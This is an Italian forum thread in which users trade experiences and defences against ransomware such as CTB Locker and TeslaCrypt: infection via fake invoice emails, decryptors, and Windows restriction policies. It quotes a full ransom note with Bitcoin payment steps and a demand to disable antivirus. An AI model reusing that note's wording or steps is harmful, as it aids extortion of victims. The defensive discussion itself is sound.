Nelle ditte in cui ho fatto assistenza, sono state criptate (ovviamente) solo le condivisioni a cui aveva accesso l'utente (=praticamente tutto il nas, vista la permissività delle policy). In alcune, addirittura, alcuni utenti erano domain admins..potete immaginare il macello.

Concordo con @telumehtar. Al momento non sono a conoscenza di casi la cui infezione sia avvenuta per semplice lettura dell'email, TUTTAVIA non c'è *mai* la certezza di non infettarsi facendolo. Potrebbero esistere varianti con qualche exploit per consentire l'esecuzione dell'allegato tramite il software di visualizzazione che usi (browser->flash/java, Outlook->exploit anteprima email, etc). L'unica cosa fondamentale è sempre avere un backup offline :)


iniziamo a usare termini che permettano meno fraintendimenti

dalle esperienze sembrerebbe che "leggendo" le mail non succeda nulla, sia tramite browser che tramite client installate sui sistemi operativi

il rischio sembra circoscritto ad "aprire/scaricare(magari si ha funzione di download automatico per l'apertura)" l'allegato o un click su link nella e-mail

poi di altri rischi nella navigazione web dipende sempre dai siti che si visitano

Vi ringrazio per le risposte, farò comunque più attenzione, che (soprattutto di questi tempi) non guasta mai!

Ho scritto ed inviato mail con un file corrotto ad un italiano collegato a dr web e mi ha detto che per adesso non esiste soluzione.

A questo punto me lo prendo di nuovo sto maledetto virus e li pago, il bello è che non so come fare!

c'è modo per contattarli?

Ho scritto ed inviato mail con un file corrotto ad un italiano collegato a dr web e mi ha detto che per adesso non esiste soluzione.

A questo punto me lo prendo di nuovo sto maledetto virus e li pago, il bello è che non so come fare!

c'è modo per contattarli?

se te lo prendi di nuovo nella speranza di recuperare i vecchi file, pagando.. credo tu stia sbagliando.. nel senso che se dalla prima infezione hai fatto trascorrere il tempo utile, hai finito il gioco.

Senza contare che una nuova infezione genererà una chiave differente.

iniziamo a usare termini che permettano meno fraintendimenti

dalle esperienze sembrerebbe che "leggendo" le mail non succeda nulla, sia tramite browser che tramite client installate sui sistemi operativi

il rischio sembra circoscritto ad "aprire/scaricare(magari si ha funzione di download automatico per l'apertura)" l'allegato o un click su link nella e-mail

poi di altri rischi nella navigazione web dipende sempre dai siti che si visitano

---
una domanda a chi ha avuto il NAS criptato da questi programmi, avevate l'accesso alle cartelle bloccati da password o erano di libera navigazione le cartelle sul NAS ? la password la lasciate memorizzata su windows in modo da non doverla ripetere ogni volta che accedete?

usare un buon antivirus forse può aiutare

Ho scritto ed inviato mail con un file corrotto ad un italiano collegato a dr web e mi ha detto che per adesso non esiste soluzione.

A questo punto me lo prendo di nuovo sto maledetto virus e li pago, il bello è che non so come fare!

c'è modo per contattarli?

chiedi alle polizie di mezzo mondo :D

dai non crederai mica che con una nuova infezione rimetti le cose a posto, i file sono già criptati quindi non sono più documenti che il virus ritiene di dove criptare, se anche li rinomini dandogli l'estensione giusta il virus anche se il medesimo cripterebbe il criptato e non l'originale, quindi pagheresti per una decriptazione che non ti riporta al file originario ma al file criptato della
prima infezione

insomma non che se ti danno un pugno sul naso te ne fai dare un altro per aggiustartelo no?

Grazie per la dettagliata spiegazione. Sto tentando tramite alcuni tools aggiornati a gennaio 2016. Vediamo se riuscirò a recuperare i files. Il problema è trovare sull'HD incriminato la chiave. In caso negativo mi vedo anch'io seguire il percorso che hai seguito tu. D'altra parte se non esiste altro modo, i 180,00 eurini serviranno almeno a qualcosa....almeno ad acquistare un antivirus per 2 anni anche se un pò caro..

Purtroppo neanche con questi tools (Kaspersky, Rakhnidecryptor) sono riuscito a recuperare i files. Nella libreria del tool è riportata l'estensione ".ccc" ma non ".doc.ccc", ".xls.ccc" come quelli che hanno cryptato a me, per cui sembra che ad oggi per i files con queste estensioni non vi sia rimedio.

Ma una volta formattato l'hd del sistema operativo gli altri HD sono al sicuro?

logico che non è il mio numero

Quindi perché aprire un allegato di una fattura con un numero telefonico che non c' entra niente con la propria persona?
(non è riferito a te ma ai malcapitati per sottolineare la leggerezza nell' aprire le mail senza controllare)


Scusate se mi intrometto un attimo nella discussione, ma se un utente si limita ad aprire la mail senza scaricare nulla, c'è la possibilità di infezione??

Io quando sono in dubbio le apro per fare eventuali verifiche MA senza cliccare ne scaricare alcun allegato, rischio comunque? :confused:


Nella mail della TIM, se guardi in fondo c'è un link, scommetto che se ci clicchi il criptolocker te lo becchi di sicuro anche senza aprire l' allegato :stordita:

Nella mail della TIM, se guardi in fondo c'è un link, scommetto che se ci clicchi il criptolocker te lo becchi di sicuro anche senza aprire l' allegato :stordita:

Premesso che a me non è arrivata nessuna mail farlocca da parte di Tim e che faccio comunque sempre estrema attenzione prima di aprire qualsiasi mail (figuriamoci quelle che finiscono nello spam, che pulisco subito), dubito fortemente (come specificato nei precedenti post) che andrei mai a cliccare un qualsiasi link in una mail di dubbia proveniienza (escluso click accidentale in segiuto ad un improvviso svenimento... :fagiano:) La domanda che ho posto (e a cui ho già ricevuto risposte più che complete, ringrazio ancora gli utenti) era specifica alla SOLA apertura. ;)

E comunque, riassumendo, da quanto ho capito è meglio non aprirle in ogni caso.

A questo punto me lo prendo di nuovo sto maledetto virus e li pago, il bello è che non so come fare!
Reinfettarti non avrebbe alcun senso: il ransomware cripta i tuoi dati con una chiave pubblica fissa ed una privata generata pseudo-casualmente che poi è stata quasi sicuramente inviata ad un server..quindi sarebbe diversa.

Perchè dico quasi sicuramente? Perchè a seconda della variante, cambia il modo di agire: le prime versioni erano stupide e buggate (= la salvavano in privato o criptavano con algoritmi bucati) mentre quelle più recenti agiscono generandola con algoritmi forti e spedendola. Inoltre, per completezza, alcune criptano tutti i files (= te ne accorgi perchè il pc macina come un matto) mentre alcune ne criptano solo una parte (= più velocità e meno rischi di essere scoperti).

Vien da se che la prima cosa da fare appena ci si infetta è determinare esattamente la variante e poi cercarne il tool di decriptazione. Se questo è disponibile, lo si utilizza e poi si và a brindare..viceversa o si paga o si conservano i dati finchè non ne verrà reso disponibile uno.

HitmanPro Alert mi ha impedito di leggere la Mia fattura di Telecom italia :fagiano:
Che poi Telecom ti dice che la fattura e' disponibile online, ma ci ero cascato lo stesso con tutti e due i piedi..

HitmanPro Alert mi ha impedito di leggere la Mia fattura di Telecom italia :fagiano:
Che poi Telecom ti dice che la fattura e' disponibile online, ma ci ero cascato lo stesso con tutti e due i piedi..

Spero non inizino anche sotto forma di fatture Fastweb farlocche, è l'unico tipo di fattura online che ricevo e in questo caso in un momento di distrazione.....

Tanto per parlare, a me pare abbia cambiato tutti i file Word PFD e jpg
IL sistema una volta formattato gira benissimo anche con tutti ggli HD connessi

Sempre tanto per parlare mi sono voluto divertire, ho rilanciato il virus e ho sweguito la procedura, arrivati alla pagina dove ti dice come pagare e quannto risultava pagabile solo con Bit Coin ed erara 1.4 e diceva 292$
Insomma una fregatura nella fregature, sono altro che 292$

Ma un tool prima o poi ci sarà?

Ma un tool prima o poi ci sarà?
Putroppo non c'è modo di saperlo. Per quel che ho visto, questi tool escono quando qualche ricercatore/società di sicurezza scopre qualche falla nel codice del ransomware o quando vengono tirati giù i server che ospitano queste chiavi. Il consiglio che do generalmente in questi casi, è di fare un ghost raw dell'hdd (visto che ormai avrai riavviato) e tenerli da parte per un futuro.

Pochi giorni fà avevo letto un articolo interessante (se lo ritrovo lo linko) riguardo alle contromisure ed alle operazioni da adottare in caso di infezione. Veniva suggerito di non riavviare e di eseguire (nell'ordine) un dump della ram (per intenderci tipo hexdump -c /dev/mem), di loggare per un pò con whiteshark (sperando che il ransomware provi a ritrasmettere la chiave ovviamente in chiaro) e poi eseguire un ghost raw dell'hdd. E' chiaro che sono semplici consigli e nulla più, tuttavia con alcune varianti potrebbero funzionare.

Ma io dico: saranno pure dei geni, ma una società come Windows non è in grado di decifrare un simile problema?
Con tutte le teste importanti che ci lavorano secondo me lo risolverebbero in 2 giorni

Ciao,

la prima protezione dai virus siamo noi stessi, quindi prima di tutto è meglio abilitare la visualizzazione delle estensioni per i tipi di file conosciuti, come dicono qui:

http://windows.microsoft.com/it-it/windows/show-hide-file-name-extensions#show-hide-file-name-extensions=windows-7

cosicchè ricevendo una mail infetta da malware, siamo in grado di riconoscere la vera estensione dell'allegato, se sarà un .exe, .com, .pif, .bat, ecc. è meglio cancellare quella mail al volo.

Il virus che ha preso oggi il mio amico, era un finto file .pdf (vera estensione .pdf.exe), i bastardi che l'hanno inviato (una finta mail di Tim con fattura) avevano pure cambiato l'icona del file, da un file .exe ad un file .pdf.

Chiaramente ho solo potuto eliminare il malware, ma nel frattempo in cui è entrato in funzione, aveva già criptato l'80% dei file del disco.
E' la terza persona che conosco che lo prende, due avevano come antivirus la vecchia versione di Nod32 7.xx con le definizioni aggiornate(il mio Nod32 9.xx mi ha eliminato da thunderbird varie mail con questa forma virale in automatico, però), ed uno aveva il Norman Antivirus. Dimenticavo, questa variante del malware ha rimosso in toto le copie shadow dal pc infettato (un win7), quindi shadow explorer non ha trovato un bel niente. :( .

bye

Ciao,

la prima protezione dai virus siamo noi stessi, quindi prima di tutto è meglio abilitare la visualizzazione delle estensioni per i tipi di file conosciuti, come dicono qui:

http://windows.microsoft.com/it-it/windows/show-hide-file-name-extensions#show-hide-file-name-extensions=windows-7

cosicchè ricevendo una mail infetta da malware, siamo in grado di riconoscere la vera estensione dell'allegato, se sarà un .exe, .com, .pif, .bat, ecc. è meglio cancellare quella mail al volo.



Ottimo consiglio! Per quanto mi riguarda, lo metto in pratica subito! Per quanto "banale", non c'avevo nemmeno pensato...

hai speso $ ? per farlo verificare

Ancora non lo so, spero che non avendomi risolto per nulla il problema mi chiedano una somma onesta. Anche perché altrimenti mi conveniva pagare.

Ciao,

la prima protezione dai virus siamo noi stessi...etcetc...


esula dal topic ma...

personalmente dissento fortemente da questa affermazione.


Io sono l'utilizzatore dello strumento "computer" e non me ne deve fregare nulla di tutto ciò che è fuori dalla mie attività di utilizzatore: navigare su internet, giocare, scrivere testi, fare di conto...etc...
Solo chi l'ha fabbricato dovrebbe GARANTIRMI di non danneggiarlo e di non danneggiare le (mie) attività connesse.

Io d altro canto devo utilizzare nel modo (FISICAMENTE) corretto questo strumento: devo alimentarlo con la corrente giusta, devo pigiare i tasti sulla tastiera con le dita e non con un martello.... Come se usassi un qualsiasi altro strumento di lavoro.

Il fatto che ci siano virus, malware, file che si corrompono, programmi che interferiscono con altri mi fa solo pensare al grande business che si autoalimenta tramite questa "informatica" apposta-malata di un era "giurassica" della tecnologia...

;)

cosa ne pensate?

un eseguibile è un eseguibile, truecript e simile criptano per uno scopo legittimo, questi virus criptano solo che poi ti chiedono il riscatto

il sistema operativo come dovrebbe capire la differenza se sei tu ad eseguirlo?

esula dal topic ma...

personalmente dissento fortemente da questa affermazione.


Io sono l'utilizzatore dello strumento "computer" e non me ne deve fregare nulla di tutto ciò che è fuori dalla mie attività di utilizzatore: navigare su internet, giocare, scrivere testi, fare di conto...etc...
Solo chi l'ha fabbricato dovrebbe GARANTIRMI di non danneggiarlo e di non danneggiare le (mie) attività connesse.

Io d altro canto devo utilizzare nel modo (FISICAMENTE) corretto questo strumento: devo alimentarlo con la corrente giusta, devo pigiare i tasti sulla tastiera con le dita e non con un martello.... Come se usassi un qualsiasi altro strumento di lavoro.

Il fatto che ci siano virus, malware, file che si corrompono, programmi che interferiscono con altri mi fa solo pensare al grande business che si autoalimenta tramite questa "informatica" apposta-malata di un era "giurassica" della tecnologia...

;)

cosa ne pensate?

Mi spiace ma l'ignoranza informatica non dovrebbe esistere, come quella in ogni altra materia, che comporta dei rischi.
Quando guidi l'auto sai che quando piove i tempi di frenata si allungano in maniera imprecisata, quindi vai più piano e devi mantenere una distanza di sicurezza maggiore, te ne puoi anche fregare (tanto c'è l'abs), ma se c'è un dolo ne DEVI pagare le conseguenze.

Io abilito a tutti e tutte le estensioni dei file, perchè identificano (quasi) la tipologia di file che si sta utilizzando. Se ricevi un file .exe, .bat, .pif, .com, da una fonte sconosciuta, sei un fesso se la apri, sbagliare è umano certo, ma perseverare nell'errore è patologicamente diabolico. ;)

bye

ps: vigilate gente, vigilate.

Mi spiace ma l'ignoranza informatica non dovrebbe esistere, come quella in ogni altra materia, che comporta dei rischi.
Quando guidi l'auto sai che quando piove i tempi di frenata si allungano in maniera imprecisata, quindi vai più piano e devi mantenere una distanza di sicurezza maggiore, te ne puoi anche fregare (tanto c'è l'abs), ma se c'è un dolo ne DEVI pagare le conseguenze.

Io abilito a tutti e tutte le estensioni dei file, perchè identificano (quasi) la tipologia di file che si sta utilizzando. Se ricevi un file .exe, .bat, .pif, .com, da una fonte sconosciuta, sei un fesso se la apri, sbagliare è umano certo, ma perseverare nell'errore è patologicamente diabolico. ;)

bye

ps: vigilate gente, vigilate.


da pseudo-esperto e appassionato condivido certamente il pensiero..

ma nessuno nasce imparato e chiunque può e (forzo un pò: ) deve essere ignorante in taluni campi.. anche perchè se non fossimo giustamente ignoranti non ci sarebbero più i chimici, i fisici, gli ingegneri, i giuristi, i carpentieri, gli idraulici... il lavoro e le professionalità della gente in generale, no?
Poi esistono delle persone che approfondiscono un pò di più qualche attività, sconfinando, ma certamente non tutte.
La professionalità di altre continua ad essere richiesta.



Non lo so, secondo me l'esempio dell'auto NON deve cadere sulla controparte del comprendere i virus o attività anomale... deve cadere sempre sul lato "fisico"della faccenda.. io compro un Notebook, non per un suo uso improprio: scagliarlo contro un passante; bensì lo uso per lavorare dati in mio possesso.

esula dal topic ma...

personalmente dissento fortemente da questa affermazione.


Io sono l'utilizzatore dello strumento "computer" e non me ne deve fregare nulla di tutto ciò che è fuori dalla mie attività di utilizzatore: navigare su internet, giocare, scrivere testi, fare di conto...etc...
Solo chi l'ha fabbricato dovrebbe GARANTIRMI di non danneggiarlo e di non danneggiare le (mie) attività connesse.

Io d altro canto devo utilizzare nel modo (FISICAMENTE) corretto questo strumento: devo alimentarlo con la corrente giusta, devo pigiare i tasti sulla tastiera con le dita e non con un martello.... Come se usassi un qualsiasi altro strumento di lavoro.

Il fatto che ci siano virus, malware, file che si corrompono, programmi che interferiscono con altri mi fa solo pensare al grande business che si autoalimenta tramite questa "informatica" apposta-malata di un era "giurassica" della tecnologia...

;)

cosa ne pensate?


Quotone!
A chi smanetta piace avere a che fare con problemi e problemini vari.
Ma chi deve usare il pc come strumento di lavoro deve - per quanto possibile - pensare a lavorare. Non a far funzionare il pc.

Insomma ad ognuno il proprio lavoro....


Facendo il parallelo con il mondo lavorativo, se ad una persona dò in uso una sega circolare, deve pensare a lavorarci (tagliare), non dovrebbe pensare a non farsi male.


Tornando più IT, ma rimanendo in tale ottica, per i ransomware sto completando il testing "pilota" di policy SRP con whitelist per i miei utenti. Non ho avuto grossi problemi da un mese a questa parte. Se va bene potrò tranquillizarli dicendogli di quasi-fregarsene del rischio di prendere il 90% dei virus e affini.

Tornando più IT, ma rimanendo in tale ottica, per i ransomware sto completando il testing "pilota" di policy SRP con whitelist per i miei utenti. Non ho avuto grossi problemi da un mese a questa parte. Se va bene potrò tranquillizarli dicendogli di quasi-fregarsene del rischio di prendere il 90% dei virus e affini.

si torniamo IT...

che policy hai messo in piedi?

andando OT per un attimo questi del ctb locker sembrerebbero avanti anni luce avanti a quelli del phishing, guardate nell'allegato la mail che mi è arrivata con 50 indirizzi visibili nel mittente che mi avverte che la mia postpay è stata bloccata :doh: :stordita:
per il momento nessuno ha ancora avuto una mail ctb con più mittenti sembrerebbe

andando OT per un attimo questi del ctb locker sembrerebbero avanti anni luce avanti a quelli del phishing, guardate nell'allegato la mail che mi è arrivata con 50 indirizzi visibili nel mittente che mi avverte che la mia postpay è stata bloccata :doh: :stordita:
per il momento nessuno ha ancora avuto una mail ctb con più mittenti sembrerebbe

si vede poco immagine troppo piccola

http://www.bleepingcomputer.com/news/security/teslacrypt-decrypted-flaw-in-teslacrypt-allows-victims-to-recover-their-files/ :read:

si vede poco immagine troppo piccola

lo so ma cmq ho dovuto anche oscurarli di mio per non ledere la privacy degli altri malcapitati, poi il sitema non mi permette allegati più grandi di 25kb, lo portassero almeno a 100kb

lo so ma cmq ho dovuto anche oscurarli di mio per non ledere la privacy degli altri malcapitati, poi il sitema non mi permette allegati più grandi di 25kb, lo portassero almeno a 100kb

usa un image hosting esterno tipo http://snag.gy/

eh vabbè.. piccola o no, si è capito che una marea di destinatari erano in chiaro...

quindi..


se un servizio tipo poste italiane, una banca o chichessia grande azienda si comporta così... è MACROSCOPICO che si tratta di una truffa (o sono sciroccati di brutto...)

si torniamo IT...

che policy hai messo in piedi?

Policy srp applicata via gpo a gruppi di utenti (chi va sotto policy sta nel gruppo).
Di default gli utenti sotto policy non possono eseguire praticamente nulla (ho lasciato giusto i files .lnk).
In whitelist ci ho messo c:\windows, program files, specifiche cartelle di rete che hanno applicativi o tool/script gestiti da me. Capita moooooooooooolto raramente che gli utenti abbiano privilegi di scrittura in tali cartelle. E se ce li hanno non credo si rendano conto di averli. :D

Il grosso del lavoro è spostare gli applicativi che gli utenti man mano usano in posizioni gestite: capire cosa fanno i software, perchè funzionano in maniera strana e regolarsi di conseguenza. Se riesci a cogliere l'occasione ti prepari anche la base per mantenere più agevolmente sul lungo periodo il tutto: delegare agli utenti di lanciare task che aggiornano automaticamente le applicazioni, o script che aggiornando con privilegi elevati software dementi, ecc ecc ecc.

Se riesci a mettere in piedi il tutto e gli fai vedere i vantaggi delle attività delegate (gestite da te, ma eseguite alla bisogna da loro) finisce che si scordano addirittura la password delle rarissime utenze amministrative (da usare per urgenze) che si lascia sempre all'utente più "poweruser"...

Non in tutti gli ambienti di lavoro te lo puoi permettere.... più le attività sono contingentate, più è fattibile.

Per farti un'idea di cosa puoi fare fai un'analisi sulle estensioni nelle condivisioni e nei profili utente (occhio alla privacy) ;-)

Quotone!
A chi smanetta piace avere a che fare con problemi e problemini vari.
Ma chi deve usare il pc come strumento di lavoro deve - per quanto possibile - pensare a lavorare. Non a far funzionare il pc.



Ok, ma io parlavo solo di riattivare la visualizzazione delle estensioni dei file, che sono l'abc dell'informatica, non di overclockare un pc. ;)


bye

Ok, ma io parlavo solo di riattivare la visualizzazione delle estensioni dei file, che sono l'abc dell'informatica, non di overclockare un pc. ;)


bye

Guarda, stiamo parlando di cose diverse.

Io parlavo del fatto che le persone devono pensare e concentrarsi sul lavoro, in quanto sono pagate per quello. L'abc informatico per le persone che per lavorare devono usare il computer è usare le applicazioni. Non ad evitare che il pc non prenda virus. Questo è il compito di qualcun'altro.

Facciamo qualche parallelo:
Se per lavoro devi spostarti in auto, dovresti sederti ed guidare. Punto (ed è già troppo). Non dovresti avere paranoie del tipo "chissà se le gomme sono gonfie, chissà quanti anni fa ho rabboccato l'olio, ecc ecc". Magari ti diverti a fare il meccanico per i fatti tuoi, ma quello è il lavoro del meccanico/assistenza. Tu sei pagato per star concentrato sulle tue attività.
Se cucini in un ristorante i tuoi pensieri dovrebbero essere focalizzati sulla cottura e a far uscire le portate dei tavoli insieme. Magari sei un fanatico della pulizia, ma se ti metti a pensare ai bicchieri in sala che potrebbero essere sporchi, forse bruci una bistecca.

I miei sono casi un po' estremi, che spero rendano l'idea. Non penso che nella realtà bisogna trattare gli utenti come dei dementi e dargli dei pc "kiosk" inutilizzabili al di fuori di quello che devono fare. Ma nemmeno che debbano fare un corso per usare il pc (non solo i programmi)...c'è chi sostiene questo.

Guarda, stiamo parlando di cose diverse.

Io parlavo del fatto che le persone devono pensare e concentrarsi sul lavoro, in quanto sono pagate per quello. L'abc informatico per le persone che per lavorare devono usare il computer è usare le applicazioni. Non ad evitare che il pc non prenda virus. Questo è il compito di qualcun'altro.

Facciamo qualche parallelo:
Se per lavoro devi spostarti in auto, dovresti sederti ed guidare. Punto (ed è già troppo). Non dovresti avere paranoie del tipo "chissà se le gomme sono gonfie, chissà quanti anni fa ho rabboccato l'olio, ecc ecc". Magari ti diverti a fare il meccanico per i fatti tuoi, ma quello è il lavoro del meccanico/assistenza. Tu sei pagato per star concentrato sulle tue attività.
Se cucini in un ristorante i tuoi pensieri dovrebbero essere focalizzati sulla cottura e a far uscire le portate dei tavoli insieme. Magari sei un fanatico della pulizia, ma se ti metti a pensare ai bicchieri in sala che potrebbero essere sporchi, forse bruci una bistecca.

I miei sono casi un po' estremi, che spero rendano l'idea. Non penso che nella realtà bisogna trattare gli utenti come dei dementi e dargli dei pc "kiosk" inutilizzabili al di fuori di quello che devono fare. Ma nemmeno che debbano fare un corso per usare il pc (non solo i programmi)...c'è chi sostiene questo.

No, sei proprio fuori strada. L'ABC informatico lo si deve esigere da un dipendente, come chi guida ha la PATENTE, quindi ha dato degli esami per poter guidare un auto, poi che si ponga il problema di gonfiare le gomme, cambiare le lampadine, ecc. è un altro discorso.
L'abc ci vuole, sapere cosa fai quando manneggi un pc è salutare per te e per chi lavora con te. ;)
Ti ricordo che per lavorare all'estero consigliano corsi di ECDL (anzi altro, qualcosa di più avanzato, non ricordo il nome), non fa mai male, sapere che dare i calci ad un pc o spegnerlo di tutto punto, può essere dannoso, ecc. ecc. ecc.
Sul virus siamo d'accordo, spetta al tecnico occuparsi della sicurezza dell'azienda, ma se mi apri un allegato .exe sei un demente, ne pagherai le conseguenze della tua ignoranza, se sei un irresponsabile devi pagare pegno, come già detto sbagliare è umano, dipende dall'errore che si compie. ;)

bye

Policy srp applicata via gpo a gruppi di utenti (chi va sotto policy sta nel gruppo).
Di default gli utenti sotto policy non possono eseguire praticamente nulla (ho lasciato giusto i files .lnk).
In whitelist ci ho messo c:\windows, program files, specifiche cartelle di rete che hanno applicativi o tool/script gestiti da me. Capita moooooooooooolto raramente che gli utenti abbiano privilegi di scrittura in tali cartelle. E se ce li hanno non credo si rendano conto di averli. :D

Il grosso del lavoro è spostare gli applicativi che gli utenti man mano usano in posizioni gestite: capire cosa fanno i software, perchè funzionano in maniera strana e regolarsi di conseguenza. Se riesci a cogliere l'occasione ti prepari anche la base per mantenere più agevolmente sul lungo periodo il tutto: delegare agli utenti di lanciare task che aggiornano automaticamente le applicazioni, o script che aggiornando con privilegi elevati software dementi, ecc ecc ecc.

Se riesci a mettere in piedi il tutto e gli fai vedere i vantaggi delle attività delegate (gestite da te, ma eseguite alla bisogna da loro) finisce che si scordano addirittura la password delle rarissime utenze amministrative (da usare per urgenze) che si lascia sempre all'utente più "poweruser"...

Non in tutti gli ambienti di lavoro te lo puoi permettere.... più le attività sono contingentate, più è fattibile.

Per farti un'idea di cosa puoi fare fai un'analisi sulle estensioni nelle condivisioni e nei profili utente (occhio alla privacy) ;-)


ok, anch io ho tagliato parecchio..

alla fine quando togli il permesso di eseguire qualsiasi file dalla cartella utente e sottocartelle e l'utente è un utente di rete limitato, sei apposto.

Sulla cartella windows e programmi e qualsiasi altra (meno che la propria dell utente ) non può scriverci. Sulla propria non può eseguire.. a questo punto è tutto blindato.

Per eseguire o fare chichessia deve evocare un poweruser.

per tutte le sfumature di sw particolari poi, va appunto verificato cosa serve come si comporta e corretto il tiro.

ok, anch io ho tagliato parecchio..

alla fine quando togli il permesso di eseguire qualsiasi file dalla cartella utente e sottocartelle e l'utente è un utente di rete limitato, sei apposto.

Sulla cartella windows e programmi e qualsiasi altra (meno che la propria dell utente ) non può scriverci. Sulla propria non può eseguire.. a questo punto è tutto blindato.

Per eseguire o fare chichessia deve evocare un poweruser.

think evil: se lasci che authenticated users possono creare cartelle in C: prima o poi ti capiterà il genio che dirotta i download in c:\download.
Poi diventa una questione di tempo.

Le whitelist funzionano con "ereditarietà": se specifichi c:\windows allora sarà whitelistato tutto.
Le blacklist (se è quello che hai fatto) no. Per esempio se vuoi blacklistare appdata\1\2\3.exe non ti basta %localappdata%\*.*, ma %localappdata%\*\*\*.*

per tutte le sfumature di sw particolari poi, va appunto verificato cosa serve come si comporta e corretto il tiro.

no pain, no gain :-)

http://www.bleepingcomputer.com/news/security/teslacrypt-decrypted-flaw-in-teslacrypt-allows-victims-to-recover-their-files/ :read:

:D
ricordo qui dentro diversi utenti infettati da teslacrypt. Ho recuperato il post di uno di questi e l'ho contattato, speriamo torni con buone notizie :)

Mi sa che cosa utile sarebbe un thread in rilievo cercando di "indicizzare" tutti i ransomware rotti

Mi trovo nel pc i file criptati in questo formato

desktop.ini.538067704

La cosa strana è che non sono criptati tutti i file, dopo aver riavviato il pc o provato a ripristiare al giorno prima non è successo nulla ed addirittura, adesso non funziona più internet ed altri programmi come libreoffice.
Sono stati criptati anche file .dll

Non è stato chiesto nessun riscatto, mi sono trovato il pc con antivirus AVAST spento e come una connessione teamviewer aperta, senza avere aperto mail o altro, quando è successo io e mia moglie stavamo guardando la tv in un'altra stanza, aspettando che finisse di caricare foto in rete di un album.

Come posso fare a capire quale virus è stato preso, la causa e soprattutto come faccio a recuperare i file?

P.s.Fortuna che ho un NAS che sembra sia rimasto illeso così ho salvato l'80% dei file....

Salve. Falsa email di Equitalia e stessa manifestazione del virus CTB Locker.
Ho rimosso con una licenza di DR Web, tuttavia i file che mi ha lasciato sono stati rinominati .rdnbdl e neppure il supporto DR. Web ha saputo al momento recuperarli.
Avete avuto esperienza con lo stesso tipo di file?
Aiutooo :mc:

Facendo un'attenta analisi mi sono trovato il messaggio che chiede il riscatto, ma ieri non mi era comparso:

Hi. Today you are a victim of malicious software.
As the main tool of the software the algorithm of AES 256 acts.
By means of it ALL YOUR files are ciphered: photo, video, documents, etc.
--------------------------------------------------------------------------------------------------------------
Advanced Encryption Standard (AES) also known as Rijndael symmetric algorithm of block enciphering.
In June, 2003 the U.S. National Security Agency decided that the code of AES is rather reliable to use it for protection of
the data which are the state secret. Up to the TOP SECRET level. Time of search of a key for interpretation of your files
any of known methods varies of 300 years, that is inexpedient. Interpretation of files isn't represented possible:
link esterno
--------------------------------------------------------------------------------------------------------------
For interpretation of your files there is only one way:

Payment of our services in interpretation of ALL data on your PC. As payment We accept only Bitcoin.
The fee sum on interpretation of your data = 1 Bitcoin ~ 450 USD.

Payment and interpretation of data:

1. You have to send exactly 1 Bitcoin to our Bitcoin the address: some btc adress

2. You have to send your identifier, and also a hash of your Bitcoin of transaction to our email: somemail@somedomen.com
(example of email: id - 87650958723, hash160 of btc transaction - 2d30e1fd2b643a0aa2c9c4db34a973b2ae3de53a2403088ed9 b71fed6759bd60)

3. Within 24 hours in reciprocal email you receive the file of the codebreaker and a confidential key for interpretation of all files on your PC.

Before start of a dekriptor We recommend to you to disconnect an antivirus. Having started a dekriptor, enter the key received in the letter,
within 15 minutes all data on your personal computer will be deciphered.
--------------------------------------------------------------------------------------------------------------
1. You can find all interesting information on Bitcoin here: link esterno
2. To buy Bitcoin for BANK WIRE, Western Union, Moneygram, etc in your country / city you can, having found the seller here: link esterno
--------------------------------------------------------------------------------------------------------------
Have a nice day

Con queste informazioni posso riuscire a riavere i miei file e capire di cosa si tratti? Per me l'ho bloccato prima che finisse, visto che alcuni file pdf e foto sono ancora integri....

Mi trovo nel pc i file criptati in questo formato

desktop.ini.538067704

La cosa strana è che non sono criptati tutti i file, dopo aver riavviato il pc o provato a ripristiare al giorno prima non è successo nulla ed addirittura, adesso non funziona più internet ed altri programmi come libreoffice.
Sono stati criptati anche file .dll

Non è stato chiesto nessun riscatto, mi sono trovato il pc con antivirus AVAST spento e come una connessione teamviewer aperta, senza avere aperto mail o altro, quando è successo io e mia moglie stavamo guardando la tv in un'altra stanza, aspettando che finisse di caricare foto in rete di un album.

Come posso fare a capire quale virus è stato preso, la causa e soprattutto come faccio a recuperare i file?

P.s.Fortuna che ho un NAS che sembra sia rimasto illeso così ho salvato l'80% dei file....

cavolo, questo è brutto.. non avevo mai sentito fin'ora uno che criptasse file dll e quindi corrompesse anche i programmi:muro:

cavolo, questo è brutto.. non avevo mai sentito fin'ora uno che criptasse file dll e quindi corrompesse anche i programmi:muro:Nemmeno io. Forse è un bug del ransomware, magari dovuto a qualche software già installato.

Avendo installato Win 10 nell'SSD, ma avendo messo utente, cartelle, etc nel disco secondario D, è stato attaccato e criptato questo (e nemmeno del tutto).
Ma come faccio a capire quale tipo di malware criptante è?

Le blacklist (se è quello che hai fatto) no. Per esempio se vuoi blacklistare appdata\1\2\3.exe non ti basta %localappdata%\*.*, ma %localappdata%\*\*\*.*è la stessa critica che ho fatto a cryptoprevent

come si fa a blacklistare una serie di directory? (o cosa mi devo studiare per impararlo a fare nel mio PC)

è la stessa critica che ho fatto a cryptoprevent

come si fa a blacklistare una serie di directory? (o cosa mi devo studiare per impararlo a fare nel mio PC)

non si può.

Non mi ricordo di preciso (richiede versioni di windows enterprise, quindi è rarissimamente usato) se si può fare con AppLocker.

leggendo gli ultimi due post che vi siete scambiati, pare che si possa fare. Ma devo aver capito male.

http://www.bleepingcomputer.com/news/security/teslacrypt-decrypted-flaw-in-teslacrypt-allows-victims-to-recover-their-files/ :read:

Ottimo ma per i files .encrypted? Ho diversi utenti che qualche mese fa è stato sbadato

per quelli come me che con l'inglese...
mi sa che per me per il momento niente da fare
i miei hanno come tipo di file hjgvgua

Ho un pc i cui file sono stati modificati in .micro. Dovrebbe essere la versione 3.0 del ransomware TeslaCryp.

Mi confermate?

leggendo gli ultimi due post che vi siete scambiati, pare che si possa fare. Ma devo aver capito male.

Apri gpedit.msc da esegui e ti porti configurazione computer->impostazione di windows->impostazioni di sicurezza->criteri restrizione software

quindi a destra premi su regole aggiuntive e lì fai aggiungi "nuova regola percorso"

e digiti
"%localappdata%\*\*\*.*" con livello di sicurezza non consentito.

Ovviamente al posto di localappdata puoi mettere le directory che vuoi ma a me sotto win8.1 e win10 ignora il comando se non metto esplicitamente il percorso e non capisco perchè.

esattamente quel che cercavo, grazie :ave:

Apri gpedit.msc da esegui e ti porti configurazione computer->impostazione di windows->impostazioni di sicurezza->criteri restrizione software

quindi a destra premi su regole aggiuntive e lì fai aggiungi "nuova regola percorso"

sono pareri, ma a meno di un computer "kiosk", io metterei la policy per utenti (piuttosto che computer). Altrimenti se devi debuggare una stupidata diventi come minimo scemo....(se non altro puoi disattivarla senza dover riavviare)

e digiti
